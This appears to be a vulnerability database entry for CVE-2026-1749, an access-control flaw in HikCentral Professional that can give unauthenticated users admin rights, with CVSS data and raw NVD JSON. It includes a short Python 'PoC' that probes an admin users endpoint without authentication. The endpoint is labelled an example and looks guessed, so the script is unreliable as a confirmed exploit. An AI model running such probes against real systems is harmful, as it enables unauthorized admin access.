Security Vulnerability Report
CVE-2026-1749 CVSS 6.8 MEDIUM

Published: 2026-05-09 09:16:09
Last Modified: 2026-05-11 16:17:30

Description

There is an Access Control Vulnerability in some HikCentral Professional versions. This could allow an unauthenticated user to obtain the admin permission.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HikCentral Professional (some versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-1749
# Description: Unauthenticated access control vulnerability in HikCentral Professional
TARGET_URL = "http://<target_ip>:<port>/api/v1/admin/users"  # Example endpoint


def check_vulnerability(url):
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json"
    }
    try:
        # Send request without authentication headers
        response = requests.get(url, headers=headers, timeout=5)
        if response.status_code == 200:
            print("[+] Potential vulnerability found: Admin access granted without auth.")
            print("[+] Response content snippet:", response.text[:200])
        else:
            print("[-] Target may not be vulnerable or endpoint is incorrect.")
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    check_vulnerability(TARGET_URL)

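References

https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-hikcentral-professional/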

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1749", "sourceIdentifier": "[email protected]", "published": "2026-05-09T09:16:08.823", "lastModified": "2026-05-11T16:17:29.510", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an Access Control Vulnerability in some HikCentral Professional versions. This could allow an unauthenticated user to obtain the admin permission."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-hikcentral-professional/", "source": "[email protected]"}]}}